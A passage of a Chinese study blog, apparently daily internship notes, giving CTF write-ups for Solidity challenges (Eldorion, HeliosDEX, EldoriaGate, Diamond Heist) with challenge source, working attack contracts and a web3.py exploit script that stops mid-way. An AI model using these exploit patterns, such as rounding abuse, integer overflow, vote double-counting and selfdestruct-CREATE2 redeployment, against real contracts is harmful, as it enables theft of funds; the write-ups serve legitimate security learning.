每日打卡

创建于：2025-08-04
更新于：2025-08-13

字数统计: 13.4k字 | 阅读时长≈ 65分

参加了ETHPanda的Web3实习计划，说是要每日打卡，这里就当作打卡暂存处吧（主要是先在这里写了方便直接复制粘贴打卡www）

说是每日笔记打卡，倒不如说更像是每笔日记打卡（笑）

2025.8.4

太久没学Web3了，今天作为打卡第一天，先稍微做点简单题热身一下吧

下面是来源于Cyber Apocalypse CTF 2025的签到题Eldorion：

// Eldorion.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

contract Eldorion {
    uint256 public health = 300;
    uint256 public lastAttackTimestamp;
    uint256 private constant MAX_HEALTH = 300;
    
    event EldorionDefeated(address slayer);
    
    modifier eternalResilience() {
        if (block.timestamp > lastAttackTimestamp) {
            health = MAX_HEALTH;
            lastAttackTimestamp = block.timestamp;
        }
        _;
    }
    
    function attack(uint256 damage) external eternalResilience {
        require(damage <= 100, "Mortals cannot strike harder than 100");
        require(health >= damage, "Overkill is wasteful");
        health -= damage;
        
        if (health == 0) {
            emit EldorionDefeated(msg.sender);
        }
    }

    function isDefeated() external view returns (bool) {
        return health == 0;
    }
}

// Setup.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

import { Eldorion } from "./Eldorion.sol";

contract Setup {
    Eldorion public immutable TARGET;
    
    event DeployedTarget(address at);

    constructor() payable {
        TARGET = new Eldorion();
        emit DeployedTarget(address(TARGET));
    }

    function isSolved() public view returns (bool) {
        return TARGET.isDefeated();
    }
}

由题意我们可以知道我们需要击败300血的Eldorion，但是每次攻击最多只能攻击100点血量，而且每次攻击会将上次攻击时间和本次攻击时间进行比对，如果本次攻击时间大于上次攻击时间则Eldorion会回满血

看起来这就是一个无底洞，但是我们可以轻松发现记录攻击时间使用的是block.timestamp，即区块生成时间，因此我们只需要让多次攻击处于同一区块内就可以绕过时间检测，同时需要注意不要Overkill，否则攻击会失败

// attack.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

interface IEldorion {
    function attack(uint256 damage) external;
    function isDefeated() external view returns (bool);
}

contract Attack{
    IEldorion public eldorion;
    constructor(address _eldorion){
        eldorion = IEldorion(_eldorion);
    }

    function attack() public{
        for(uint8 i=0; i<3; i++){
            eldorion.attack(100);
        }
        require(eldorion.isDefeated(), "Failed to solve the problem");
    }
}

部署后调用attack()即可完成本题

是不是有点太水了，那就接着再水一题吧，是同一个CTF的第2题HeliosDEX：

// HeliosDEX.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

/***
    __  __     ___            ____  _______  __
   / / / /__  / (_)___  _____/ __ \/ ____/ |/ /
  / /_/ / _ \/ / / __ \/ ___/ / / / __/  |   / 
 / __  /  __/ / / /_/ (__  ) /_/ / /___ /   |  
/_/ /_/\___/_/_/\____/____/_____/_____//_/|_|  
                                               
    Today's item listing:
    * Eldorion Fang (ELD): A shard of a Eldorion's fang, said to imbue the holder with courage and the strength of the ancient beast. A symbol of valor in battle.
    * Malakar Essence (MAL): A dark, viscous substance, pulsing with the corrupted power of Malakar. Use with extreme caution, as it whispers promises of forbidden strength. MAY CAUSE HALLUCINATIONS.
    * Helios Lumina Shards (HLS): Fragments of pure, solidified light, radiating the warmth and energy of Helios. These shards are key to powering Eldoria's invisible eye.
***/

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/utils/math/Math.sol";

contract EldorionFang is ERC20 {
    constructor(uint256 initialSupply) ERC20("EldorionFang", "ELD") {
        _mint(msg.sender, initialSupply);
    }
}

contract MalakarEssence is ERC20 {
    constructor(uint256 initialSupply) ERC20("MalakarEssence", "MAL") {
        _mint(msg.sender, initialSupply);
    }
}

contract HeliosLuminaShards is ERC20 {
    constructor(uint256 initialSupply) ERC20("HeliosLuminaShards", "HLS") {
        _mint(msg.sender, initialSupply);
    }
}

contract HeliosDEX {
    EldorionFang public eldorionFang;
    MalakarEssence public malakarEssence;
    HeliosLuminaShards public heliosLuminaShards;

    uint256 public reserveELD;
    uint256 public reserveMAL;
    uint256 public reserveHLS;
    
    uint256 public immutable exchangeRatioELD = 2;
    uint256 public immutable exchangeRatioMAL = 4;
    uint256 public immutable exchangeRatioHLS = 10;

    uint256 public immutable feeBps = 25;

    mapping(address => bool) public hasRefunded;

    bool public _tradeLock = false;
    
    event HeliosBarter(address item, uint256 inAmount, uint256 outAmount);
    event HeliosRefund(address item, uint256 inAmount, uint256 ethOut);

    constructor(uint256 initialSupplies) payable {
        eldorionFang = new EldorionFang(initialSupplies);
        malakarEssence = new MalakarEssence(initialSupplies);
        heliosLuminaShards = new HeliosLuminaShards(initialSupplies);
        reserveELD = initialSupplies;
        reserveMAL = initialSupplies;
        reserveHLS = initialSupplies;
    }

    modifier underHeliosEye {
        require(msg.value > 0, "HeliosDEX: Helios sees your empty hand! Only true offerings are worthy of a HeliosBarter");
        _;
    }

    modifier heliosGuardedTrade() {
        require(_tradeLock != true, "HeliosDEX: Helios shields this trade! Another transaction is already underway. Patience, traveler");
        _tradeLock = true;
        _;
        _tradeLock = false;
    }

    function swapForELD() external payable underHeliosEye {
        uint256 grossELD = Math.mulDiv(msg.value, exchangeRatioELD, 1e18, Math.Rounding(0));
        uint256 fee = (grossELD * feeBps) / 10_000;
        uint256 netELD = grossELD - fee;

        require(netELD <= reserveELD, "HeliosDEX: Helios grieves that the ELD reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");

        reserveELD -= netELD;
        eldorionFang.transfer(msg.sender, netELD);

        emit HeliosBarter(address(eldorionFang), msg.value, netELD);
    }

    function swapForMAL() external payable underHeliosEye {
        uint256 grossMal = Math.mulDiv(msg.value, exchangeRatioMAL, 1e18, Math.Rounding(1));
        uint256 fee = (grossMal * feeBps) / 10_000;
        uint256 netMal = grossMal - fee;

        require(netMal <= reserveMAL, "HeliosDEX: Helios grieves that the MAL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");

        reserveMAL -= netMal;
        malakarEssence.transfer(msg.sender, netMal);

        emit HeliosBarter(address(malakarEssence), msg.value, netMal);
    }

    function swapForHLS() external payable underHeliosEye {
        uint256 grossHLS = Math.mulDiv(msg.value, exchangeRatioHLS, 1e18, Math.Rounding(3));
        uint256 fee = (grossHLS * feeBps) / 10_000;
        uint256 netHLS = grossHLS - fee;
        
        require(netHLS <= reserveHLS, "HeliosDEX: Helios grieves that the HSL reserves are not plentiful enough for this exchange. A smaller offering would be most welcome");
        

        reserveHLS -= netHLS;
        heliosLuminaShards.transfer(msg.sender, netHLS);

        emit HeliosBarter(address(heliosLuminaShards), msg.value, netHLS);
    }

    function oneTimeRefund(address item, uint256 amount) external heliosGuardedTrade {
        require(!hasRefunded[msg.sender], "HeliosDEX: refund already bestowed upon thee");
        require(amount > 0, "HeliosDEX: naught for naught is no trade. Offer substance, or be gone!");

        uint256 exchangeRatio;
        
        if (item == address(eldorionFang)) {
            exchangeRatio = exchangeRatioELD;
            require(eldorionFang.transferFrom(msg.sender, address(this), amount), "ELD transfer failed");
            reserveELD += amount;
        } else if (item == address(malakarEssence)) {
            exchangeRatio = exchangeRatioMAL;
            require(malakarEssence.transferFrom(msg.sender, address(this), amount), "MAL transfer failed");
            reserveMAL += amount;
        } else if (item == address(heliosLuminaShards)) {
            exchangeRatio = exchangeRatioHLS;
            require(heliosLuminaShards.transferFrom(msg.sender, address(this), amount), "HLS transfer failed");
            reserveHLS += amount;
        } else {
            revert("HeliosDEX: Helios descries forbidden offering");
        }

        uint256 grossEth = Math.mulDiv(amount, 1e18, exchangeRatio);

        uint256 fee = (grossEth * feeBps) / 10_000;
        uint256 netEth = grossEth - fee;

        hasRefunded[msg.sender] = true;
        payable(msg.sender).transfer(netEth);
        
        emit HeliosRefund(item, amount, netEth);
    }
}


// Setup.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

import { HeliosDEX } from "./HeliosDEX.sol";

contract Setup {
    HeliosDEX public TARGET;
    address public player;
    
    event DeployedTarget(address at);

    constructor(address _player) payable {
        TARGET = new HeliosDEX{value: 1000 ether}(1000);
        player = _player;
        emit DeployedTarget(address(TARGET));
    }

    function isSolved() public view returns (bool) {
        return player.balance >= 20 ether;
    }
}

由于比赛已经过了很久了，我也不知道自己手上有多少初始ETH，假定是0.1ETH吧，同时为了方便在Remix调试（我懒得自己搓一个Foundry script了），稍微降低一下Setup中的参数，最终根据实际情况预定是传入99 ether（考虑到gas费无法传入100 ether），初始参数同样设置为99，isSolved等比修改为2 ether

这题提供了一个能交换3种ERC20的DEX，每种代币都有其独特的汇率，最后的refund只能兑换1种代币，从合约来看自然是HLS汇率最好，能和ETH达到1:0.1的汇率；除此之外，兑换代币和refund的时候都会收取2.5‰的手续费

观察一下合约，refund被一个reentrancy guard修饰，且只有该函数能转出ETH，因此重入攻击打不了，所以想解题只能尽可能多兑换代币

观察三种代币的兑换方式，我们发现它们都使用了OZ的mulDiv函数，但是其参数中的Math.Rounding十分可疑，因此我们查看OZ的合约源码：

library Math {
    enum Rounding {
        Floor, // Toward negative infinity
        Ceil, // Toward positive infinity
        Trunc, // Toward zero
        Expand // Away from zero
    }
    // ...
}

那么我们会发现兑换ELD，MAL，HLS时，计算得到的代币数量分别会向下取整，向上取整，向上取整（由于不可能兑换负数个代币），因此我们可以仅使用1 wei兑换1个MAL或者1个HLS；同时由于整数除法导致的精度损失，我们兑换代币的数量只要不到400，就能忽略手续费，因此我们可以编写如下的攻击合约：

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.28;

interface IHeliosDEX{
    function swapForHLS() external payable;
    function oneTimeRefund(address item, uint256 amount) external;
}

interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
}

contract Attack {
    IHeliosDEX public dex;
    constructor(address _dex) {
        dex = IHeliosDEX(_dex);
    }

    function attack(address item) public payable{
        uint iterations = msg.value;
        require(iterations > 80, "Too less iterations");
        for(uint i=0; i<iterations; i++){
            dex.swapForHLS{value: 1 wei}();
        }
        IERC20(item).approve(address(dex), iterations);
        dex.oneTimeRefund(item, iterations);
        refund();
        require(msg.sender.balance > 2 ether, "Failed to solve this problem");
    }

    function refund() internal{
        payable(msg.sender).transfer(address(this).balance);
    }

    receive() external payable {}
}

需要注意一下，对于原题，使用for循环可能导致gas费消耗问题，可以稍微更改一下，此处仅作为思路提供

同时在最后进行refund前需要首先向DEX进行Approve操作，否则DEX的transferFrom会失败导致revert，同时由于转钱是转给msg.sender，因此需要给合约添加receive()函数接收转账，并添加提款函数提走合约内的资金以完成本题

行吧，就这样了，开摆~

2025.8.5

凌晨学完，白天就不用学了（确信）

接着看看CACTF的压轴题EldoriaGate吧：

// EldoriaGate.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

/***
    Malakar 1b:22-28, Tales from Eldoria - Eldoria Gates
  
    "In ages past, where Eldoria's glory shone,
     Ancient gates stand, where shadows turn to dust.
     Only the proven, with deeds and might,
     May join Eldoria's hallowed, guiding light.
     Through strict trials, and offerings made,
     Eldoria's glory, is thus displayed."
  
                   ELDORIA GATES
             *_   _   _   _   _   _ *
     ^       | `_' `-' `_' `-' `_' `|       ^
     |       |                      |       |
     |  (*)  |     .___________     |  \^/  |
     | _<#>_ |    //           \    | _(#)_ |
    o+o \ / \0    ||   =====   ||   0/ \ / (=)
     0'\ ^ /\/    ||           ||   \/\ ^ /`0
       /_^_\ |    ||    ---    ||   | /_^_\
       || || |    ||           ||   | || ||
       d|_|b_T____||___________||___T_d|_|b
  
***/

import { EldoriaGateKernel } from "./EldoriaGateKernel.sol";

contract EldoriaGate {
    EldoriaGateKernel public kernel;

    event VillagerEntered(address villager, uint id, bool authenticated, string[] roles);
    event UsurperDetected(address villager, uint id, string alertMessage);
    
    struct Villager {
        uint id;
        bool authenticated;
        uint8 roles;
    }

    constructor(bytes4 _secret) {
        kernel = new EldoriaGateKernel(_secret);
    }

    function enter(bytes4 passphrase) external payable {
        bool isAuthenticated = kernel.authenticate(msg.sender, passphrase);
        require(isAuthenticated, "Authentication failed");

        uint8 contribution = uint8(msg.value);        
        (uint villagerId, uint8 assignedRolesBitMask) = kernel.evaluateIdentity(msg.sender, contribution);
        string[] memory roles = getVillagerRoles(msg.sender);
        
        emit VillagerEntered(msg.sender, villagerId, isAuthenticated, roles);
    }

    function getVillagerRoles(address _villager) public view returns (string[] memory) {
        string[8] memory roleNames = [
            "SERF", 
            "PEASANT", 
            "ARTISAN", 
            "MERCHANT", 
            "KNIGHT", 
            "BARON", 
            "EARL", 
            "DUKE"
        ];

        (, , uint8 rolesBitMask) = kernel.villagers(_villager);

        uint8 count = 0;
        for (uint8 i = 0; i < 8; i++) {
            if ((rolesBitMask & (1 << i)) != 0) {
                count++;
            }
        }

        string[] memory foundRoles = new string[](count);
        uint8 index = 0;
        for (uint8 i = 0; i < 8; i++) {
            uint8 roleBit = uint8(1) << i; 
            if (kernel.hasRole(_villager, roleBit)) {
                foundRoles[index] = roleNames[i];
                index++;
            }
        }

        return foundRoles;
    }

    function checkUsurper(address _villager) external returns (bool) {
        (uint id, bool authenticated , uint8 rolesBitMask) = kernel.villagers(_villager);
        bool isUsurper = authenticated && (rolesBitMask == 0);
        emit UsurperDetected(
            _villager,
            id,
            "Intrusion to benefit from Eldoria, without society responsibilities, without suspicions, via gate breach."
        );
        return isUsurper;
    }
}


// EldoriaGateKernal.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

contract EldoriaGateKernel {
    bytes4 private eldoriaSecret;
    mapping(address => Villager) public villagers;
    address public frontend;

    uint8 public constant ROLE_SERF     = 1 << 0;
    uint8 public constant ROLE_PEASANT  = 1 << 1;
    uint8 public constant ROLE_ARTISAN  = 1 << 2;
    uint8 public constant ROLE_MERCHANT = 1 << 3;
    uint8 public constant ROLE_KNIGHT   = 1 << 4;
    uint8 public constant ROLE_BARON    = 1 << 5;
    uint8 public constant ROLE_EARL     = 1 << 6;
    uint8 public constant ROLE_DUKE     = 1 << 7;
    
    struct Villager {
        uint id;
        bool authenticated;
        uint8 roles;
    }

    constructor(bytes4 _secret) {
        eldoriaSecret = _secret;
        frontend = msg.sender;
    }

    modifier onlyFrontend() {
        assembly {
            if iszero(eq(caller(), sload(frontend.slot))) {
                revert(0, 0)
            }
        }
        _;
    }

    function authenticate(address _unknown, bytes4 _passphrase) external onlyFrontend returns (bool auth) {
        assembly {
            let secret := sload(eldoriaSecret.slot)            
            auth := eq(shr(224, _passphrase), secret)
            mstore(0x80, auth)
            
            mstore(0x00, _unknown)
            mstore(0x20, villagers.slot)
            let villagerSlot := keccak256(0x00, 0x40)
            
            let packed := sload(add(villagerSlot, 1))
            auth := mload(0x80)
            let newPacked := or(and(packed, not(0xff)), auth)
            sstore(add(villagerSlot, 1), newPacked)
        }
    }

    function evaluateIdentity(address _unknown, uint8 _contribution) external onlyFrontend returns (uint id, uint8 roles) {
        assembly {
            mstore(0x00, _unknown)
            mstore(0x20, villagers.slot)
            let villagerSlot := keccak256(0x00, 0x40)

            mstore(0x00, _unknown)
            id := keccak256(0x00, 0x20)
            sstore(villagerSlot, id)

            let storedPacked := sload(add(villagerSlot, 1))
            let storedAuth := and(storedPacked, 0xff)
            if iszero(storedAuth) { revert(0, 0) }

            let defaultRolesMask := ROLE_SERF
            roles := add(defaultRolesMask, _contribution)
            if lt(roles, defaultRolesMask) { revert(0, 0) }

            let packed := or(storedAuth, shl(8, roles))
            sstore(add(villagerSlot, 1), packed)
        }
    }

    function hasRole(address _villager, uint8 _role) external view returns (bool hasRoleFlag) {
        assembly {
            mstore(0x0, _villager)
            mstore(0x20, villagers.slot)
            let villagerSlot := keccak256(0x0, 0x40)
        
            let packed := sload(add(villagerSlot, 1))
            let roles := and(shr(8, packed), 0xff)
            hasRoleFlag := gt(and(roles, _role), 0)
        }
    }
}


// SPDX-License-Identifier: MIT

pragma solidity ^0.8.28;

import { EldoriaGate } from "./EldoriaGate.sol";

contract Setup {
    EldoriaGate public TARGET;
    address public player;

    event DeployedTarget(address at);

    constructor(bytes4 _secret, address _player) {
        TARGET = new EldoriaGate(_secret);
        player = _player;
        emit DeployedTarget(address(TARGET));
    }

    function isSolved() public returns (bool) {
        return TARGET.checkUsurper(player);
    }
}

由题意我们需要使得checkUsurper()返回为True，而与之对应的是要让我们的role为0，其默认的值为ROLE_SERF即1

说句实话题目合约真没有什么能让我们交互的，因此说白了就是通过调用enter()来实现修改role的操作，那就让我们一步步看：

首先会进行一次authenticate(bytes4 passphrase)去匹配密码是否正确，而密码被存放在Kernal的Storage Slot 0处，因此我们直接用cast去获取指定存储槽内数据即可

通过认证后会调用Kernal的evaluateIdentity，而其中的contribution参数为我们发送的msg.value，好巧不巧Kernal中的实现里面判断role是通过add(defaultRoleMask, _contribution)实现的，虽然后面有lt小于判断，但是由于使用的是assembly，而且role是uint8数据类型，因此会存在整型溢出，所以只需要让_contribution为255就能让我们的role为0，从而解出本题

由于使用了非合约操作进行解题，这里就不放解题合约了，总之就是使用cast storage --rpc-url "your rpc url" "kernal address" 0读取Storage Slot获取密码后调用enter{value: 255 wei}(password)即可

暂且这样吧，明天开始复现一下那些纯Blockchain的CTF题

以防有人说我水，这里再放一个RemedyCTF最简单的题（除去签到题）Diamond Heist的Writeup，附件这里就不给出来了，6个合约杀了我吧（

这道题总共有6个合约，看起来非常恐怖，但是实际上是所有题目里面解出数第2高的（第1是签到）

首先分析Challenge.sol，里面的要求非常简单：获取所有的Diamond代币即可，然后初始给了自己10000 ether的HexensCoin代币，并且将所有的Diamond代币转到了Vault里
VaultFactory.sol和名字一样，就是一个合约工厂，通过salt生成Vault合约，所以使用的是CREATE2操作码，至于使用的salt在Challenge.sol里面有，此处按下不表
Diamond.sol很直白，就是一个普通的ERC20合约，知道这一点就行
Burner.sol，一个销毁用合约，很直白
接下来是两个核心合约：首先来看HexensCoin.sol，这个合约也是一个ERC20合约，唯一的差别就是它添加了一个delegate机制（委托机制）：根据委托人所持有的HexensCoin数量，增加被委托人的Votes（即票数），而用户所持有的Votes数量仅在调用_moveDelegates函数的时候进行更新，且获取Votes仅会读取上一个Checkpoint的Votes数但是问题就在于委托人将自己持有的HexensCoin通过transfer转移给其它用户的时候，被委托人的Votes仍旧不会发生改变（缺少了beforeTokenTransfer的override），因此这会导致Votes数可以刷上去，比如统一给A刷票，那首先让B调用delegate(address(A))后将自己的HexensCoin转给C，再让C进行delegate，以此类推
最后是Vault.sol，这是一个UUPS可升级代理合约，说明我们可以对这个合约进行升级，同时可以指定合约的implementation，也就是说我们可以尝试通过升级这个合约来达成恶意的操作；至于governanceCall我们可以通过刚刚提到的刷票方法进行调用，而burn的话则是可以让我们“销毁”掉Vault中所有的Diamond，至于为什么带双引号这里先卖个关子

注意看题目附件中的Challenge.py，里面说明本题区块链的分叉为Shanghai分叉，也就是说此时selfdestruct仍然可以在constructor以外被调用时删除合约字节码，因此我们可以销毁掉Vault再重新部署一个新的Vault并初始化，这样我们就拥有了金库的所有权；同时这个金库还可以升级为添加了恶意函数的金库，从而达成获取所有Diamond代币的目的

接下来我们回收一下伏笔：Burner自毁的操作，实际上只销毁了所有的ETH（甚至也没有，因为参数是payable(address(this))，也就是把ETH发送到本地址后销毁，ETH还在这个地址），而ERC20并不会随之消失，因为ERC20本质上还是一个合约，而ERC20的数量本质上也是合约的一个mapping的value，因此“被销毁的Diamond”仍然保留在创建的Burner的地址中

那么此时就到了高潮部分：已知创建Burner的时候使用的语句是new，说明使用的是CREATE操作码，而nonce是1（即Burner是Vault创建的第1个合约），所以如果我们重新创建的Vault的地址是一样的，那么创建的Burner的地址也是一样的；而创建Vault的时候使用的又是CREATE2，合约工厂地址固定、salt已知，所以我们只需要控制新创建的Vault的init_code（也就是constructor部分）一致就能保证新建的Vault一定是原先的Vault的地址

因此我们可以给原先的Vault添加2个新的函数：（x.sol）

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.13;

import "./openzeppelin-contracts/interfaces/IERC20.sol";
import "./openzeppelin-contracts/interfaces/IERC3156FlashBorrower.sol";
import "./openzeppelin-contracts-upgradeable/proxy/utils/Initializable.sol";
import "./openzeppelin-contracts-upgradeable/proxy/utils/UUPSUpgradeable.sol";
import "./openzeppelin-contracts-upgradeable/access/OwnableUpgradeable.sol";

import "./Diamond.sol";
import "./Burner2.sol";
import "./HexensCoin.sol";

contract X is Initializable, UUPSUpgradeable, OwnableUpgradeable {
    uint public constant AUTHORITY_THRESHOLD = 100_000 ether;

    Diamond diamond;
    HexensCoin hexensCoin;

    function initialize(
        address diamond_,
        address hexensCoin_
    ) public initializer {
        __Ownable_init();
        diamond = Diamond(diamond_);
        hexensCoin = HexensCoin(hexensCoin_);
    }

    function governanceCall(bytes calldata data) external {
        require(
            msg.sender == owner() ||
                hexensCoin.getCurrentVotes(msg.sender) >= AUTHORITY_THRESHOLD
        );
        (bool success, ) = address(this).call(data);
        require(success);
    }

    function burn(address token, uint amount) external {
        require(msg.sender == owner() || msg.sender == address(this));
        Burner burner = new Burner();
        IERC20(token).transfer(address(burner), amount);
        burner.destruct();
    }

    function _authorizeUpgrade(address) internal view override {
        require(msg.sender == owner() || msg.sender == address(this));
        require(IERC20(diamond).balanceOf(address(this)) == 0);
    }

    function _selfdestruct() public {
        selfdestruct(payable(address(this)));
    }

    function new_sender() public {
        Burner burner = new Burner();
        burner.destruct2(address(diamond));
        IERC20(diamond).transfer(msg.sender, 31337);
    }
}

我们这个恶意的Vault添加了自毁函数以方便我们重新部署合约并获得owner权限，同时添加了new_sender函数创建并使用我们恶意的Burner合约将“被销毁”的Diamond重新发送给恶意Vault并最终发送到我们自己手上

恶意的Burner合约如下：（Burner2.sol）

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.13;

import "./Diamond.sol";

contract Burner {
    Diamond diamond;

    constructor() {}

    function destruct() external {
        selfdestruct(payable(address(this)));
    }

    function destruct2(address _diamond) external {
        diamond = Diamond(_diamond);
        diamond.transfer(msg.sender, 31337);
    }
}

那么至此我们的攻击路径就基本完成了：

可能有人会问：为什么要销毁再创建新的Vault？我升级后直接调用new_sender不就好了？欸，还记得CREATE操作码的nonce是什么吗？是这个合约已创建的合约数+1，也就是说如果此时调用new_sender那么nonce是2，那么我们是无法获取到Diamond的（因为压根就不在那），销毁是为了重置这个nonce，就这么简单

那么这里就给出一个（应该能够运行的）脚本吧，别被吓到了，大部分都是合约的ABI，核心逻辑在后面

from web3 import Web3
from eth_account import Account
import solcx

# Configuration
RPC_URL = "http://164.90.231.253:8545/RARSiytkQIREDxCMlQjaKzzX/main"
PRIVATE_KEY = "0x85aa8a192685c1994e222fa9abf0c5a3156d03f8da6f0712477bcd8f1d35bcd5"
CHALLENGE_ADDRESS = "0xDb95DC78E696E454bAEC14570523bba1397bF4d0"
w3 = Web3(Web3.HTTPProvider(RPC_URL))
account = Account.from_key(PRIVATE_KEY)

def send_transaction(contract_function, account, privKey=PRIVATE_KEY):
    """Helper function to send transactions"""
    transaction = contract_function.build_transaction(
        {
            "from": account.address,
            "nonce": w3.eth.get_transaction_count(account.address),
            "gas": 500000,
            "maxFeePerGas": w3.eth.gas_price * 2,
            "maxPriorityFeePerGas": w3.eth.gas_price,
        }
    )

    signed_txn = w3.eth.account.sign_transaction(transaction, privKey)
    tx_hash = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
    return receipt

def transfer(to, amount):
    tx = {
        "from": account.address,
        "to": to,
        "value": amount,
        "gas": 500000,
        "gasPrice": w3.eth.gas_price,
        "nonce": w3.eth.get_transaction_count(account.address),
    }

    signed_tx = w3.eth.account.sign_transaction(tx, PRIVATE_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
    return receipt

def main():
    print(f"Connected to network. Chain ID: {w3.eth.chain_id}")
    print(f"Using account: {account.address}")

    _solc_version = "0.8.13"
    solcx.set_solc_version(_solc_version)
    # Contract ABIs
    challenge = w3.eth.contract(
        address=CHALLENGE_ADDRESS,
        abi=[
            {
                "inputs": [],
                "name": "claim",
                "outputs": [],
                "stateMutability": "nonpayable",
                "type": "function",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "player", "type": "address"}
                ],
                "stateMutability": "nonpayable",
                "type": "constructor",
            },
            {
                "inputs": [],
                "name": "diamond",
                "outputs": [
                    {"internalType": "contract Diamond", "name": "", "type": "address"}
                ],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "DIAMONDS",
                "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "HEXENS_COINS",
                "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "hexensCoin",
                "outputs": [
                    {
                        "internalType": "contract HexensCoin",
                        "name": "",
                        "type": "address",
                    }
                ],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "isSolved",
                "outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "PLAYER",
                "outputs": [{"internalType": "address", "name": "", "type": "address"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "vault",
                "outputs": [
                    {"internalType": "contract Vault", "name": "", "type": "address"}
                ],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "vaultFactory",
                "outputs": [
                    {
                        "internalType": "contract VaultFactory",
                        "name": "",
                        "type": "address",
                    }
                ],
                "stateMutability": "view",
                "type": "function",
            },
        ],
    )

    # Get contract addresses
    hexens_coin_addr = challenge.functions.hexensCoin().call()
    vault_addr = challenge.functions.vault().call()
    vaultFactory_addr = challenge.functions.vaultFactory().call()

    print(f"HexensCoin address: {hexens_coin_addr}")
    print(f"Vault address: {vault_addr}")
    print(f"VaultFactory address: {vaultFactory_addr}")

    hexens_coin = w3.eth.contract(
        address=hexens_coin_addr,
        abi=[
            {
                "type": "function",
                "name": "delegate",
                "inputs": [
                    {"name": "delegatee", "type": "address", "internalType": "address"}
                ],
                "outputs": [],
                "stateMutability": "nonpayable",
            },
            {
                "type": "function",
                "name": "transfer",
                "inputs": [
                    {"name": "to", "type": "address", "internalType": "address"},
                    {"name": "amount", "type": "uint256", "internalType": "uint256"},
                ],
                "outputs": [{"name": "", "type": "bool", "internalType": "bool"}],
                "stateMutability": "nonpayable",
            },
            {
                "type": "function",
                "name": "balanceOf",
                "inputs": [
                    {"name": "account", "type": "address", "internalType": "address"}
                ],
                "outputs": [{"name": "", "type": "uint256", "internalType": "uint256"}],
                "stateMutability": "view",
            },
            {
                "type": "function",
                "name": "getCurrentVotes",
                "inputs": [
                    {"name": "account", "type": "address", "internalType": "address"}
                ],
                "outputs": [{"name": "", "type": "uint256", "internalType": "uint256"}],
                "stateMutability": "view",
            },
        ],
    )

    vault = w3.eth.contract(
        address=vault_addr,
        abi=[
            {
                "inputs": [{"internalType": "bytes", "name": "data", "type": "bytes"}],
                "name": "governanceCall",
                "outputs": [],
                "stateMutability": "nonpayable",
                "type": "function",
            },
        ],
    )

    diamond_addr = challenge.functions.diamond().call()
    print(f"Diamond address: {diamond_addr}")
    diamond_addr = challenge.functions.diamond().call()
    diamond = w3.eth.contract(
        address=diamond_addr,
        abi=[
            {
                "inputs": [
                    {
                        "internalType": "uint256",
                        "name": "totalSupply_",
                        "type": "uint256",
                    }
                ],
                "stateMutability": "nonpayable",
                "type": "constructor",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "owner", "type": "address"},
                    {"internalType": "address", "name": "spender", "type": "address"},
                    {"internalType": "uint256", "name": "value", "type": "uint256"},
                ],
                "name": "Approval",
                "type": "event",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "from", "type": "address"},
                    {"internalType": "address", "name": "to", "type": "address"},
                    {"internalType": "uint256", "name": "value", "type": "uint256"},
                ],
                "name": "Transfer",
                "type": "event",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "owner", "type": "address"},
                    {"internalType": "address", "name": "spender", "type": "address"},
                ],
                "name": "allowance",
                "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "spender", "type": "address"},
                    {"internalType": "uint256", "name": "amount", "type": "uint256"},
                ],
                "name": "approve",
                "outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
                "stateMutability": "nonpayable",
                "type": "function",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "account", "type": "address"}
                ],
                "name": "balanceOf",
                "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "decimals",
                "outputs": [{"internalType": "uint8", "name": "", "type": "uint8"}],
                "stateMutability": "view",
                "type": "function",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "spender", "type": "address"},
                    {
                        "internalType": "uint256",
                        "name": "subtractedValue",
                        "type": "uint256",
                    },
                ],
                "name": "decreaseAllowance",
                "outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
                "stateMutability": "nonpayable",
                "type": "function",
            },
            {
                "inputs": [
                    {"internalType": "address", "name": "spender", "type": "address"},
                    {
                        "internalType": "uint256",
                        "name": "addedValue",
                        "type": "uint256",
                    },
                ],
                "name": "increaseAllowance",
                "outputs": [{"internalType": "bool", "name": "", "type": "bool"}],
                "stateMutability": "nonpayable",
                "type": "function",
            },
            {
                "inputs": [],
                "name": "name",
                "outputs": [{"internalType": "string", "name": "", "type": "string"}],
                "stateMutability": "view",
